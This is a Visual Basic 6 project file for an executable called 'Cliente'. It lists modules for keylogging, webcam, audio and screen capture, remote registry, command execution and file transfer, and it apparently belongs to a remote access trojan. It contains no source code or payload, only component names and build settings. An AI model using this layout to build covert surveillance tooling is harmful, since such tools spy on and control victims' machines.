Type=Exe
Reference=*\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\Windows\SysWOW64\stdole2.tlb#OLE Automation
Reference=*\G{D8F48390-7C4E-4222-9099-CC074689BDF8}#1.0#0#C:\Windows\SysWow64\IVBExtractImageLib.tlb#VB IExtractImage Interface
Reference=*\G{F79CDF3D-7771-4BC3-8501-29C4FA52CA91}#1.0#0#Zombie.tlb#tlbZombie
Form=Forms\FrmCliente.frm
Module=MdlGlobal; Module\MdlGlobal.bas
Class=cTimer; Class\cTimer.cls
Class=ClsSearch; Class\ClsSearch.cls
Module=modGdipThumbnailStream; Module\modGdipThumbnailStream.bas
Class=ClsExplorer; Class\ClsExplorer.cls
Class=clsFileTransfer; Class\clsFileTransfer.cls
Module=WinSock32; Module\WinSock32.bas
Class=ClsZip; Class\ClsZip.cls
Class=ClsWebCam; Class\ClsWebCam.cls
Module=mInvoke; Module\mInvoke.bas
Module=modKeyLogger; Module\modKeyLogger.bas
Class=ClsKeyLogger; Class\ClsKeyLogger.cls
Class=ClsCmd; Class\ClsCmd.cls
Class=clsRegistry; Class\clsRegistry.cls
Class=ClsRemoteRegistry; Class\ClsRemoteRegistry.cls
Class=ClsProcess; Class\ClsProcess.cls
Module=ModProcess; Module\ModProcess.bas
Module=ModWindows; Module\modWindows.bas
Class=ClsAudio; Class\ClsAudio.cls
Class=ClsDIB; Class\ClsDIB.cls
Class=ClsCRC; Class\clsCRC.cls
Class=ClsScreen; Class\cRDSC.cls
Class=ClsDesktop; Class\ClsDesktop.cls
IconForm="FrmCliente"
Startup="FrmCliente"
HelpFile=""
Title="Cliente"
ExeName32="Cliente.exe"
Command32=""
Name="Cliente"
HelpContextID="0"
CompatibleMode="0"
MajorVer=1
MinorVer=0
RevisionVer=0
AutoIncrementVer=0
ServerSupportFiles=0
CompilationType=0
OptimizationType=0
FavorPentiumPro(tm)=0
CodeViewDebugInfo=0
NoAliasing=0
BoundsCheck=0
OverflowCheck=0
FlPointCheck=0
FDIVCheck=0
UnroundedFP=0
StartMode=0
Unattended=0
Retained=0
ThreadPerObject=0
MaxNumberOfThreads=1
